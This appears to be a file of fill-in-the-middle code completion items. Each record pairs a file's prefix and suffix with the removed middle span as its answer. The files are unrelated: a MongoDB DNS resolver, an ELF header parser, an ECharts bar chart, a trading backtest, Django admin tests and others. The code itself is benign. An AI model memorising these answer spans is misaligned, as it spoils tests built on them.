dns.go | // Copyright (C) MongoDB, Inc. 2017-present.
//
// Licensed under the Apache License, Version 2.0 (the "License"); you may
// not use this file except in compliance with the License. You may obtain
// a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
package dns
import (
"errors"
"fmt"
"net"
"runtime"
"strings"
)
// Resolver resolves DNS records.
type Resolver struct {
// Holds the functions to use for DNS lookups
LookupSRV func(string, string, string) (string, []*net.SRV, error)
LookupTXT func(string) ([]string, error)
}
// DefaultResolver is a Resolver that uses the default Resolver from the net package.
var DefaultResolver = &Resolver{net.LookupSRV, net.LookupTXT}
// ParseHosts uses the srv string to get the hosts.
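// An illustrative call (the hostname below is a placeholder, not a real SRV record):
//
//	hosts, err := DefaultResolver.ParseHosts("cluster0.example.com", true)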
func (r *Resolver) ParseHosts(host string, stopOnErr bool) ([]string, error) {
parsedHosts := strings.Split(host, ",")
if len(parsedHosts) != 1 {
return nil, fmt.Errorf("URI with SRV must include one and only one hostname")
}
return r.fetchSeedlistFromSRV(parsedHosts[0], stopOnErr)
}
// GetConnectionArgsFromTXT gets the TXT record associated with the host and returns the connection arguments.
func (r *Resolver) GetConnectionArgsFromTXT(host string) ([]string, error) {
var connectionArgsFromTXT []string
// error ignored because not finding a TXT record should not be
// considered an error.
recordsFromTXT, _ := r.LookupTXT(host)
// This is a temporary fix to get around bug https://github.com/golang/go/issues/21472.
// It will currently incorrectly concatenate multiple TXT records to one
// on windows.
if runtime.GOOS == "windows" {
recordsFromTXT = []string{strings.Join(recordsFromTXT, "")}
}
if len(recordsFromTXT) > 1 {
return nil, errors.New("multiple records from TXT not supported")
}
if len(recordsFromTXT) > 0 {
connectionArgsFromTXT = strings.FieldsFunc(recordsFromTXT[0], func(r rune) bool { return r == ';' || r == '&' })
err := validateTXTResult(connectionArgsFromTXT)
if err != nil {
return nil, err
}
}
return connectionArgsFromTXT, nil
}
func (r *Resolver) fetchSeedlistFromSRV(host string, stopOnErr bool) ([]string, error) {
var err error
_, _, err = net.SplitHostPort(host)
if err == nil {
// we were able to successfully extract a port from the host,
// but should not be able to when using SRV
return nil, fmt.Errorf("URI with srv must not include a port number")
}
_, addresses, err := r.LookupSRV("mongodb", "tcp", host)
if err != nil {
return nil, err
}
trimmedHost := strings.TrimSuffix(host, ".")
var parsedHosts []string
for _, address := range addresses {
trimmedAddressTarget := strings.TrimSuffix(address.Target, ".")
err := validateSRVResult(trimmedAddressTarget, trimmedHost)
if err != nil {
if stopOnErr {
return nil, err
}
continue
}
parsedHosts = append(parsedHosts, fmt.Sprintf("%s:%d", trimmedAddressTarget, address.Port))
}
return parsedHosts, nil
}
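// validateSRVResult checks that an SRV target shares the domain suffix of the input
// hostname: everything after the input's first label must match the tail of the record.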
func validateSRVResult(recordFromSRV, inputHostName string) error {
separatedInputDomain := strings.Split(inputHostName, ".")
separatedRecord := strings.Split(recordFromSRV, ".")
if len(separatedRecord) < 2 {
return errors.New("DNS name must contain at least 2 labels")
}
if len(separatedRecord) < len(separatedInputDomain) {
return errors.New("Domain suffix from SRV record not matched input domain")
}
inputDomainSuffix := separatedInputDomain[1:]
domainSuffixOffset := len(separatedRecord) - (len(separatedInputDomain) - 1)
recordDomainSuffix := separatedRecord[domainSuffixOffset:]
for ix, label := range inputDomainSuffix {
if label != recordDomainSuffix[ix] {
return errors.New("Domain suffix from SRV record not matched input domain")
}
}
return nil
}
var allowedTXTOptions = map[string]struct{}{
"authsource": {},
"replicaset": {},
"loadbalanced": {},
}
func | (paramsFromTXT []string) error {
for _, param := range paramsFromTXT {
kv := strings.SplitN(param, "=", 2)
if len(kv) != 2 {
return errors.New("Invalid TXT record")
}
key := strings.ToLower(kv[0])
if _, ok := allowedTXTOptions[key]; !ok {
return fmt.Errorf("Cannot specify option '%s' in TXT record", kv[0])
}
}
return nil
}
| validateTXTResult |
RemainingPlayers.tsx | import React from 'react'
import { useNetTableValues } from 'react-panorama';
import Styles from './styles.module.css';
const avatar: Partial<VCSSStyleDeclaration> = {
width: '20px',
height: '20px',
border: '1px solid rgba(0, 0, 0, 0.5)',
borderRadius: '5px',
verticalAlign: 'center',
horizontalAlign: 'left',
marginLeft: '5px',
marginRight: '5px',
}
const RemainingPlayers = () => {
const heroes = useNetTableValues('HeroSelectionHeroes').heroes;
const allPlayerIDs: PlayerID[] = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20];
const unpickedPlayerIDs = allPlayerIDs
.filter(id => !Object.values(heroes).some(hero => hero.playerID === id))
.filter(id => Players.IsValidPlayerID(id));
if (unpickedPlayerIDs.length === 0) {
return null;
}
return (
<Panel className={Styles.container}>
<Label className={Styles.label} text={'Players Remaining'} /> | <DOTAAvatarImage
key={id}
steamid={Game.GetPlayerInfo(id).player_steamid}
style={avatar}
/>
))}
</Panel>
</Panel>
);
}
export default RemainingPlayers; | <Panel className={Styles.imagesContainer} >
{unpickedPlayerIDs.map(id => ( |
file_header.rs | use crate::inter::*;
#[derive(Clone, Debug)]
pub struct FileHeader {
elf_ident:ElfIdent,
e_type:u16,
e_machine:u16,
e_version:u32,
e_entry:u32,
e_phoff:u32,
e_shoff:u32,
e_flags:u32,
e_ehsize:u16,
e_phentsize:u16,
e_phnum:u16,
e_shentsize:u16,
e_shnum:u16,
e_shstrndx:u16,
}
impl FileHeader{
pub fn new(file:&[u8])->FileHeader{
FileHeader{
elf_ident: ElfIdent::new(&file[0..9]),
e_type: u8_to_u16(&file[0x10..0x12]),
e_machine: u8_to_u16(&file[0x12..0x14]),
e_version: u8_to_u32(&file[0x14..0x18]),
e_entry: u8_to_u32(&file[0x18..0x1C]),
e_phoff: u8_to_u32(&file[0x1C..0x20]),
e_shoff:u8_to_u32(&file[0x20..0x24]),
e_flags:u8_to_u32(&file[0x24..0x28]),
e_ehsize:u8_to_u16(&file[0x28..0x2A]),
e_phentsize:u8_to_u16(&file[0x2A..0x2C]),
e_phnum:u8_to_u16(&file[0x2C..0x2E]),
e_shentsize:u8_to_u16(&file[0x2E..0x30]),
e_shnum:u8_to_u16(&file[0x30..0x32]),
e_shstrndx:u8_to_u16(&file[0x32..0x34]),
}
}
pub fn get_e_shoff(&self)->u32{
self.e_shoff
}
pub fn get_e_shentsize(&self)->u16{
self.e_shentsize
}
pub fn get_e_shnum(&self)->u16{
self.e_shnum
}
pub fn | (&self)->u32{
self.e_entry
}
}
#[derive(Clone, Debug)]
struct ElfIdent{
ei_mag:u32,
ei_class:u8,
ei_data:u8,
ei_version:u8,
ei_osabi:u8,
ei_abiversion:u8,
}
impl ElfIdent{
pub fn new(ei:&[u8])->ElfIdent{
ElfIdent{
ei_mag:u8_to_u32(&ei[0..4]),
ei_class:ei[4],
ei_data:ei[5],
ei_version:ei[6],
ei_osabi:ei[7],
ei_abiversion:ei[8],
}
}
} | get_e_entry |
transer.js | /** 立体柱状图
* 支持的配置:
* barWidth:number,柱状图宽度,0~1
* barGap:number,柱状图系列间隔 0~1
* stack:bool,开启堆叠模式
* countStart: function(params, api, wSize, value), 自定义柱子定位点计算函数
* label:object , 柱子顶部label
* layout:string, 设置为y时柱子会横向放置,y轴会成为名称轴,x轴为数值轴
* barMinHeight:number/function(height, seriesIndex, dataIndex),柱子最小高度,为function时返回值将作为柱子最终高度
* barMaxWidth: number, 柱子最大宽度
* beforeRender: function(option), echarts渲染前触发,可调整生成的option
*/
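/*
 * A minimal usage sketch (illustrative only: the import name, chart instance and sample
 * data below are placeholder assumptions, not values shipped with this module):
 *
 *   import renderStereoBar from "./transer";
 *   renderStereoBar(myEchartsInstance, {
 *     title: "Quarterly profit",
 *     dataSource: {
 *       name: ["Q1", "Q2", "Q3"],
 *       data: [{ name: "profit", value: [12, 30, 22] }],
 *     },
 *     stack: false,
 *     layout: "x",
 *   });
 */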
import renderBarItem from "./renderitem";
import getAxis from "./axis";
import { customBarLabel } from "./label";
import themeDict from "./theme";
import utils from "./util";
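// countRange computes the value-axis extent of the series data: the overall max/min of
// individual values in normal mode, or of the per-category stacked sums when stack is enabled.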
function countRange(data, stack) {
var sum = [];
let max, min;
data.forEach((s, i) => {
let theMax = Math.max.apply(null, s.value);
let theMin = Math.min.apply(null, s.value);
if ((!max && max !== 0) || theMax > max) {
max = theMax;
}
if ((!min && min !== 0) || theMin < min) {
min = theMin;
}
s.value.forEach(function(item, j) {
sum[j] = sum[j] || 0;
sum[j] += item;
});
});
max = stack ? Math.max.apply(null, sum) : max;
min = stack ? Math.min.apply(null, sum) : min;
return { max, min };
}
function transer(settings, context) {
let {
dataSource: data,
theme,
barWidth,
barMaxWidth,
barGap,
stack,
countStart,
layout,
maxScale,
valueAxisMax,
valueAxisMin,
barMinHeight,
baseShapeControl,
stand = false,
halo = false,
eccentricity = 0.36,
attachItems,
} = settings;
let stackData = {};
let makeHaloItems = (x, y, r, themeItem, myEccentricity) => {
return {
type: "circle",
shape: {
cx: x,
cy: y,
r: r,
},
origin: [x, y],
scale:
layout !== "y"
? [1, myEccentricity || eccentricity]
: [myEccentricity || eccentricity, 1],
style: {
stroke: themeItem.arcBorder,
lineWidth: themeItem.arcBorderWidth,
fill: "transparent",
},
z2: 10,
};
};
let labelItems = function(option) {
let { value } = option;
let items = [];
var labelItem = customBarLabel(value, settings, option);
if (labelItem && labelItem.children) {
labelItem.children.forEach((item) => (item.z2 = 10));
items.push(labelItem);
}
return items;
};
let barLayoutCount = stack || !data.data.length ? 1 : data.data.length;
barGap = barGap || 0.4 / barLayoutCount;
barWidth = barWidth || 0.6 / (barLayoutCount + 0.5);
let series = data.data.map(function(item, i) {
return {
name: item.name,
type: "custom",
itemStyle: {
normal: {
color: theme[i].color,
},
},
renderItem: renderBarItem({
countStart: function(_ref) {
var params = _ref.params,
api = _ref.api,
wSize = _ref.width,
dh = _ref.height;
if (countStart) return countStart.apply(this, arguments);
var seriesIndex = params.seriesIndex,
dataIndex = params.dataIndex;
if (dataIndex === 0 && seriesIndex === 0) {
stackData = {};
}
var stackValue = (stackData[dataIndex] = stackData[dataIndex] || {});
var countSum = function countSum() {
var sum = 0;
Object.keys(stackValue).forEach(function(key) {
if (key >= seriesIndex) return;
var item = stackValue[key] || 0;
sum += item;
});
return sum;
};
var num = data.data.length;
var pIndex = seriesIndex;
var height = countSum() || 0;
if (layout !== "y") {
var o = api.coord([dataIndex, 0]);
if (stack) {
o[1] -= height;
} else {
o[0] +=
pIndex * wSize * (1 + barGap) -
((num - 1) / 2) * wSize * (1 + barGap);
}
} else {
o = api.coord([0, dataIndex]);
if (stack) {
o[0] += height;
} else {
o[1] -=
pIndex * wSize * (1 + barGap) -
((num - 1) / 2) * wSize * (1 + barGap);
}
}
stackValue[seriesIndex] = dh;
return o;
},
barWidth: barWidth || 0.25,
barMaxWidth,
layout: layout,
barMinHeight: barMinHeight,
baseShapeControl: baseShapeControl,
eccentricity,
context,
style: (params, witch) => {
let themeItem;
if (typeof theme == "function") {
themeItem = theme(params, witch);
} else {
themeItem = theme[params.seriesIndex];
}
if (!themeItem) {
return null;
}
if (witch == "arc") {
return {
fill: themeItem.arcColor,
stroke: themeItem.arcBorder,
lineWidth: themeItem.arcBorderWidth,
};
} else {
return {
fill: themeItem.color,
stroke: "transparent",
lineWidth: 0,
};
}
},
attach({ params, o, width, height }) {
let { seriesIndex } = params;
let items = [];
let isStand = () => {
if (stack) return seriesIndex === 0;
return true;
};
let themeItem = theme[seriesIndex];
if (stand && isStand()) {
let item = makeHaloItems(
o[0],
o[1],
width * 0.65,
themeItem,
eccentricity * 1.35
);
item.z2 = -1;
Object.assign(item.style, {
lineWidth: themeItem.arcBorderWidth * 1.5,
});
items.push(item);
let standFillItem = {
type: "arc",
shape: {
cx: o[0],
cy: o[1],
r: width * 0.7,
r0: width / 2,
},
origin: o,
scale:
layout !== "y"
? [1, eccentricity * 1.35]
: [eccentricity * 1.35, 1],
style: {
stroke: "transparent",
fill: themeItem.standFill,
},
z2: -1,
};
items.push(standFillItem);
let standShadowItem = {
type: "arc",
shape: {
cx: o[0],
cy: o[1],
r: width * 1.2,
r0: width * 0.7,
},
origin: o,
scale:
layout !== "y"
? [1, eccentricity * 1.35]
: [eccentricity * 1.35, 1],
style: {
stroke: "transparent",
fill: themeItem.standShadowFill,
},
z2: -1,
};
items.push(standShadowItem);
}
if (halo && isStand()) {
let dh = halo.threshold || 30;
o = o.concat([]);
if (height > dh) {
let ox = o[0],
oy = o[1];
if (layout == "y") {
ox += dh;
} else {
oy -= dh;
}
items.push(makeHaloItems(ox, oy, width / 2, themeItem));
items.push(makeHaloItems(ox, oy, (width * 3) / 10, themeItem));
if (layout == "y") {
ox -= width / 20;
} else {
oy += width / 20;
}
items.push(
makeHaloItems(ox, oy, (width * 2) / 10, theme[seriesIndex])
);
}
}
let labels = labelItems(arguments[0]);
items = items.concat(labels || []);
if (typeof attachItems == "function") {
items = items.concat(attachItems.apply(this, arguments));
}
return items;
},
}),
dimensions: ["from", "to", "profit"],
data: item.value,
};
});
var option = {
grid: {
containLabel: true
},
series: series,
};
let axisOption = getAxis(data.name, settings);
let valueRange = countRange(data.data, stack);
let axisMax = null,
axisMin = null,
maxHeight = valueRange.max,
minHeight = valueRange.min < 0 ? valueRange.min : 0;
if (stack) {
axisMax = maxHeight * (maxScale || 1.1);
axisMin = minHeight * (maxScale || 1.1);
if (axisMax > 10) {
axisMax = Math.round(axisMax);
} else if (axisMax > 1 && axisMax < 10) {
axisMax = Math.round(axisMax * 100) / 100;
}
if (axisMin < -10) {
axisMin = Math.round(axisMin);
    } else if (axisMin > -10 && axisMin < 1) {
axisMin = Math.round(axisMin * 100) / 100;
}
}
if (valueAxisMax) {
axisMax =
typeof valueAxisMax == "function" | : valueAxisMax;
}
if (valueAxisMin) {
axisMin =
typeof valueAxisMin == "function"
? valueAxisMin(minHeight)
: valueAxisMin;
}
if (axisMax && axisMax > 0) {
axisOption[layout == "y" ? "xAxis" : "yAxis"][0].max = axisMax;
}
if (axisMin && axisMin < 0) {
axisOption[layout == "y" ? "xAxis" : "yAxis"][0].min = axisMin;
}
option = Object.assign({}, axisOption, option);
return option;
}
export { renderBarItem };
export default function(target, settings) {
  let { option = {}, title, tooltip, theme, beforeRender, ...chartSettings } = settings;
  option.tooltip = Object.assign(option.tooltip || {}, tooltip || {});
  option.title = Object.assign(option.title || {}, typeof title == "object" ? title : { text: title || "" });
  let themes = theme ? theme.map((item) => themeDict[item] || item) : [];
  if (!themes.length) {
    themes = Object.keys(themeDict).map((item) => themeDict[item]);
  }
chartSettings.theme = themes;
let chart = target;
let chartOption = transer(chartSettings, chart);
if(!chart) {
return chartOption;
}
let optionResult = utils.extend(chartOption, option);
console.log(optionResult);
beforeRender && beforeRender(chartOption, optionResult);
chart.setOption(optionResult);
return chart;
} | ? valueAxisMax(maxHeight) |
assert.go | package assert
import "testing"
func Nil(err error, t *testing.T, msgs ...string) {
if err != nil {
t.Fatal(msgs, "error:", err)
}
}
func | (v bool, t *testing.T, msgs ...string) {
if !v {
t.Fatal(msgs)
}
}
func False(v bool, t *testing.T, msgs ...string) {
True(!v, t, msgs...)
}
func Err(err error, t *testing.T, msgs ...string) {
if err == nil {
t.Fatal(msgs, "error:", err)
}
}
| True |
index.test.tsx | import React from 'react'
import { render } from '@testing-library/react'
import CopyLight from './index'
test('<CopyLight /> should render', () => { | const screen = render(<CopyLight />)
expect(screen.getByText(/Created by/)).toBeInTheDocument()
}) |
|
p_var.py | class car:
__topspeed = 0
__name=""
def __init__(self):
self.__topspeed=250
        self.__name="SAM"
def drive(self):
print("Drive Top Speed=" +str(self.__topspeed))
def setTopSpeed(self,speed):
|
volvo=car()
volvo.drive()
volvo.setTopSpeed(380)
volvo.drive() | self.__topspeed=speed |
Ibex2010Sma.py | # PyAlgoSamples
# Examples using the PyAlgoTrade Library
#
# Copyright 2015-2017 Isaac de la Pena
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: Isaac de la Pena <[email protected]>
"""
from pyalgotrade import strategy, plotter
from pyalgotrade.barfeed import yahoofeed
from pyalgotrade.technical import ma
from pyalgotrade.stratanalyzer import drawdown, returns, sharpe, trades
from pyalgotrade.utils import stats
from pyalgoext import volatility
import Ibex2010Assets as assets
import pyalgotrade.logger as logger
import math
import os
class MyBenchmark(strategy.BacktestingStrategy):
def __init__(self, feed, instruments, posMax, delay):
strategy.BacktestingStrategy.__init__(self, feed, 1000000)
self._delay = delay
self._liquidity = 0.05
self._positions = {}
self._posMax = posMax
self._instruments = instruments
self.setUseAdjustedValues(True)
self.getBroker().getFillStrategy().setVolumeLimit(None)
self.startDateTime = feed.peekDateTime() |
def onEnterCanceled(self, position):
del self._positions[position.getInstrument()]
self.logOp("COMPRA CANCELADA", position.getEntryOrder())
def onExitOk(self, position):
del self._positions[position.getInstrument()]
self.logOp("VENTA", position.getExitOrder())
def onExitCanceled(self, position):
# If the exit was canceled, re-submit it.
position.exitMarket()
self.logOp("VENTA CANCELADA", position.getExitOrder())
def onBars(self, bars):
# Wait for the same bar than the strategy
if self._delay > 0:
self._delay -= 1
return
for instrument in self._instruments:
if instrument in bars:
if instrument not in self._positions:
if len(self._positions) < self._posMax:
self.prepareLong(instrument, bars)
def prepareLong(self, instrument, bars):
bar = bars[instrument]
perInstrument = self.getBroker().getEquity() / self._posMax
cash = self.getBroker().getCash()
if perInstrument > cash:
perInstrument = cash
perInstrument *= (1 - self._liquidity)
amount = int(perInstrument / bar.getPrice())
if amount > 0:
self._positions[instrument] = self.enterLong(instrument, amount, True)
def onFinish(self, bars):
self.endDateTime = bars.getDateTime()
def logOp(self, type, order):
self.info("[%s] %s %s %s" % (len(self._positions), type, order.getInstrument(), order.getExecutionInfo()))
class MyStrategy(MyBenchmark):
def __init__(self, feed, instruments, posMax, smaShort, smaLong):
MyBenchmark.__init__(self, feed, instruments, posMax, smaLong)
self._smaShort = {}
self._smaLong = {}
for instrument in instruments:
self._smaShort[instrument] = ma.SMA(feed[instrument].getPriceDataSeries(), smaShort)
self._smaLong[instrument] = ma.SMA(feed[instrument].getPriceDataSeries(), smaLong)
def getSMAShorts(self):
return self._smaShort
def getSMALongs(self):
return self._smaLong
def onBars(self, bars):
for instrument in self._instruments:
# Wait for enough bars to be available to calculate a SMA.
if not self._smaLong[instrument] or self._smaLong[instrument][-1] is None:
return
if instrument in bars:
# If a position was not opened, check if we should enter a long position.
if instrument not in self._positions:
if len(self._positions) < self._posMax:
if self._smaShort[instrument][-1] > self._smaLong[instrument][-1]:
self.prepareLong(instrument, bars)
# Check if we have to exit the position.
elif self._smaShort[instrument][-1] < self._smaLong[instrument][-1]:
if not self._positions[instrument].exitActive():
self._positions[instrument].exitMarket()
def run_strategy(isBenchmark, instruments, posMax, smaShort, smaLong):
# Load the yahoo feed from the CSV file
feed = yahoofeed.Feed()
feed.sanitizeBars(True)
for instrument, startYear in instruments.items():
for year in range(startYear, assets.endYear):
if os.path.isfile(assets.folder + instrument + "-" + str(year) + ".csv"):
feed.addBarsFromCSV(instrument, assets.folder + instrument + "-" + str(year) + ".csv")
if isBenchmark:
myStrategy = MyBenchmark(feed, instruments, posMax, smaLong)
else:
myStrategy = MyStrategy(feed, instruments, posMax, smaShort, smaLong)
# Attach analyzers to the strategy.
# Returns first in case others use it (DataSeries)
returnsAnalyzer = returns.Returns()
myStrategy.attachAnalyzer(returnsAnalyzer)
returnsAnalyzer.getReturns().setMaxLen(1000000)
sharpeAnalyzer = sharpe.SharpeRatio()
myStrategy.attachAnalyzer(sharpeAnalyzer)
drawDownAnalyzer = drawdown.DrawDown()
myStrategy.attachAnalyzer(drawDownAnalyzer)
tradesAnalyzer = trades.Trades()
myStrategy.attachAnalyzer(tradesAnalyzer)
volaAnalyzer = volatility.VolaAnalyzer(120)
myStrategy.attachAnalyzer(volaAnalyzer)
# Attach a plotter to the strategy
plt = plotter.StrategyPlotter(myStrategy, False)
volaSeries = volaAnalyzer.getVolaSeries()
plt.getOrCreateSubplot("Volatility").addDataSeries("Volatility", volaSeries)
capStart = myStrategy.getBroker().getEquity()
myStrategy.info("CAPITAL INICIAL: $%.4f" % capStart)
# Run the strategy
myStrategy.run()
# Show basic information
allRet = returnsAnalyzer.getReturns()
capEnd = myStrategy.getBroker().getEquity()
myStrategy.info("CAPITAL FINAL: $%.4f" % capEnd)
myStrategy.info(" ")
myStrategy.info("Rentabilidad: %.4f%%" % (100 * (capEnd - capStart) / capStart))
myStrategy.info("Rentabilidad Anualizada: %.4f%%" % (100 * (math.pow((capEnd / capStart),(365.0 / ((myStrategy.endDateTime - myStrategy.startDateTime).days))) - 1)))
myStrategy.info("Volatilidad Anualizada: %.4f%%" % (100 * stats.stddev(allRet, 1) * math.sqrt(252)))
myStrategy.info("Ratio de Sharpe Anualizado: %.4f" % (100 * sharpeAnalyzer.getSharpeRatio(0.0036, True)))
myStrategy.info("DrawDown Maximo: %.4f%%" % (100 * drawDownAnalyzer.getMaxDrawDown()))
myStrategy.info("DrawDown Mas Largo: %s dias" % (drawDownAnalyzer.getLongestDrawDownDuration().days))
myStrategy.info(" ")
myStrategy.info("Rentabilidad Media: %.4f%%" % (100 * stats.mean(allRet)))
posRet = []
negRet = []
allRet = returnsAnalyzer.getReturns()
for ret in allRet:
if ret > 0:
posRet.append(ret)
elif ret < 0:
negRet.append(ret)
myStrategy.info("Ganancia Media: %.4f%%" % (100 * stats.mean(posRet)))
myStrategy.info("Perdida Media: %.4f%%" % (100 * stats.mean(negRet)))
myStrategy.info(" ")
myStrategy.info("Ganancia Media por Op: $%s" % (stats.mean(tradesAnalyzer.getProfits())))
myStrategy.info("Perdida Media por Op: $%s" % (stats.mean(tradesAnalyzer.getLosses())))
myStrategy.info("Comisiones Totales: $%s" % (sum(tradesAnalyzer.getCommissionsForAllTrades())))
myStrategy.info("Num Ops Igual: %s" % (tradesAnalyzer.getEvenCount()))
myStrategy.info("Num Ops Gano: %s" % (tradesAnalyzer.getProfitableCount()))
myStrategy.info("Num Ops Pierdo: %s" % (tradesAnalyzer.getUnprofitableCount()))
# Plot the strategy.
plt.plot()
logger.log_format = "[%(levelname)s] %(message)s"
smaShort = 50
smaLong = 200
# Benchmark
#run_strategy(True, assets.indices, 1, smaShort, smaLong)
# Strategy
run_strategy(False, assets.instruments, 32, smaShort, smaLong) | self.endDateTime = None
def onEnterOk(self, position):
self.logOp("COMPRA", position.getEntryOrder()) |
main.go | /*
A presentation of the tview package, implemented with tview.
Navigation
The presentation will advance to the next slide when the primitive demonstrated
in the current slide is left (usually by hitting Enter or Escape). Additionally,
the following shortcuts can be used:
- Ctrl-N: Jump to next slide
- Ctrl-P: Jump to previous slide
*/
package main
import (
"fmt"
"strconv"
"github.com/gdamore/tcell"
"github.com/rivo/tview"
)
// Slide is a function which returns the slide's main primitive and its title.
// It receives a "nextSlide" function which can be called to advance the
// presentation to the next slide.
type Slide func(nextSlide func()) (title string, content tview.Primitive)
// The application.
var app = tview.NewApplication()
// Starting point for the presentation.
func main() | {
// The presentation slides.
slides := []Slide{
Cover,
Introduction,
HelloWorld,
InputField,
Form,
TextView1,
TextView2,
Table,
TreeView,
Flex,
Grid,
Colors,
End,
}
// The bottom row has some info on where we are.
info := tview.NewTextView().
SetDynamicColors(true).
SetRegions(true).
SetWrap(false)
// Create the pages for all slides.
currentSlide := 0
info.Highlight(strconv.Itoa(currentSlide))
pages := tview.NewPages()
previousSlide := func() {
currentSlide = (currentSlide - 1 + len(slides)) % len(slides)
info.Highlight(strconv.Itoa(currentSlide)).
ScrollToHighlight()
pages.SwitchToPage(strconv.Itoa(currentSlide))
}
nextSlide := func() {
currentSlide = (currentSlide + 1) % len(slides)
info.Highlight(strconv.Itoa(currentSlide)).
ScrollToHighlight()
pages.SwitchToPage(strconv.Itoa(currentSlide))
}
for index, slide := range slides {
title, primitive := slide(nextSlide)
pages.AddPage(strconv.Itoa(index), primitive, true, index == currentSlide)
fmt.Fprintf(info, `%d ["%d"][darkcyan]%s[white][""] `, index+1, index, title)
}
// Create the main layout.
layout := tview.NewFlex().
SetDirection(tview.FlexRow).
AddItem(pages, 0, 1, true).
AddItem(info, 1, 1, false)
// Shortcuts to navigate the slides.
app.SetInputCapture(func(event *tcell.EventKey) *tcell.EventKey {
if event.Key() == tcell.KeyCtrlN {
nextSlide()
} else if event.Key() == tcell.KeyCtrlP {
previousSlide()
}
return event
})
app.EnableMouse()
// Start the application.
if err := app.SetRoot(layout, true).Run(); err != nil {
panic(err)
}
} |
|
TradingAlgorythm.py | import json
from datetime import datetime, timedelta
from bittrex.bittrex import Bittrex
def TradingAlorythm(command, market, amount, coinname, step, stoploss, key, secret):
| TestTrading = Bittrex(key, secret)
period = timedelta(seconds=20)
next_tick = datetime.now() + period
seconds = 20
firstCycle = True
if command == "y":
print("buying {0} of {1} coins".format(amount, coinname))
        # uncomment to create a buy order
# TestTrading.buy_limit(market, amount, coinprice)
while command == "y":
        # timer fires every 20 seconds
if next_tick <= datetime.now():
print("Connecting to Bittrex")
seconds += 20
next_tick += period
print("Timer ticked")
print("Updating stock exchange...")
            # Read the current ticker values
t = TestTrading.get_ticker(market)
            # Request the balance
balance = TestTrading.get_balance(coinname)
            # Request the currently open orders
orders = TestTrading.get_open_orders(market)
a = json.dumps(t)
            # Print the ticker values
print(t)
            # Print the balance
print("Balance is {} ".format(balance['result']['Available']))
            # Print the orders
print(orders)
            # Unpack the values into variables
bid = t['result']['Bid']
ask = t['result']['Ask']
last = t['result']['Last']
if firstCycle:
StartValue = bid
firstCycle = False
Stop_loss = StartValue - 0.00000007
print("*--------------------------")
print("| Start Value | {: .8f} ".format(StartValue))
print("| Stop loss | {: .8f} ".format(Stop_loss))
print("|--------------------------")
print("| Bid | {: .8f} ".format(bid))
print("| Ask | {: .8f} ".format(ask))
print("| Last | {: .8f} ".format(last))
print("*--------------------------")
            # Append Bid to the end of the array
# A.append(float(bid))
if bid >= step + StartValue:
print("MOVE STOP-LOSS")
StartValue = bid
if bid <= stoploss:
print("Sell order sent") |
|
test_admin.py | from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
    """A function that executes before all tests"""
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email='[email protected]',
password='password123'
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email='[email protected]',
password='password123',
name='Test user full name'
)
def test_users_listed(self):
"""Test that users are listed on user page"""
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_change_page(self):
"""Test that the user edit page works"""
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def | (self):
"""Test that the create user page works"""
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| test_create_user_page |
objector.py | """Provides the Objector class."""
from json import loads
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Union
from .exceptions import ClientException, RedditAPIException
from .models.reddit.base import RedditBase
from .util import snake_case_keys
if TYPE_CHECKING: # pragma: no cover
from ... import praw
class Objector:
"""The objector builds :class:`.RedditBase` objects."""
@classmethod
def parse_error(
cls, data: Union[List[Any], Dict[str, Dict[str, str]]]
) -> Optional[RedditAPIException]:
"""Convert JSON response into an error object.
:param data: The dict to be converted.
:returns: An instance of :class:`~.RedditAPIException`, or ``None`` if ``data``
doesn't fit this model.
"""
if isinstance(data, list):
# Fetching a Submission returns a list (of two items). Although it's handled
# manually in `Submission._fetch()`, assume it's a possibility here.
return None
errors = data.get("json", {}).get("errors")
if errors is None:
return None
if len(errors) < 1:
# See `Collection._fetch()`.
raise ClientException("successful error response", data)
return RedditAPIException(errors)
@classmethod
def check_error(cls, data: Union[List[Any], Dict[str, Dict[str, str]]]):
"""Raise an error if the argument resolves to an error object."""
error = cls.parse_error(data)
if error:
raise error
def | (self, reddit: "praw.Reddit", parsers: Optional[Dict[str, Any]] = None):
"""Initialize an Objector instance.
:param reddit: An instance of :class:`~.Reddit`.
"""
self.parsers = {} if parsers is None else parsers
self._reddit = reddit
def _objectify_dict(self, data):
"""Create RedditBase objects from dicts.
:param data: The structured data, assumed to be a dict.
:returns: An instance of :class:`~.RedditBase`.
"""
if {"conversation", "messages", "modActions"}.issubset(data):
parser = self.parsers["ModmailConversation"]
elif {"actionTypeId", "author", "date"}.issubset(data):
# Modmail mod action
data = snake_case_keys(data)
parser = self.parsers["ModmailAction"]
elif {"bodyMarkdown", "isInternal"}.issubset(data):
# Modmail message
data = snake_case_keys(data)
parser = self.parsers["ModmailMessage"]
elif {"kind", "short_name", "violation_reason"}.issubset(data):
# This is a Rule
parser = self.parsers["rule"]
elif {"isAdmin", "isDeleted"}.issubset(data):
# Modmail author
data = snake_case_keys(data)
# Prevent clobbering base-36 id
del data["id"]
data["is_subreddit_mod"] = data.pop("is_mod")
parser = self.parsers[self._reddit.config.kinds["redditor"]]
elif {"banStatus", "muteStatus", "recentComments"}.issubset(data):
# Modmail user
data = snake_case_keys(data)
data["created_string"] = data.pop("created")
parser = self.parsers[self._reddit.config.kinds["redditor"]]
elif {"displayName", "id", "type"}.issubset(data):
# Modmail subreddit
data = snake_case_keys(data)
parser = self.parsers[self._reddit.config.kinds[data["type"]]]
elif {"date", "id", "name"}.issubset(data) or {
"id",
"name",
"permissions",
}.issubset(data):
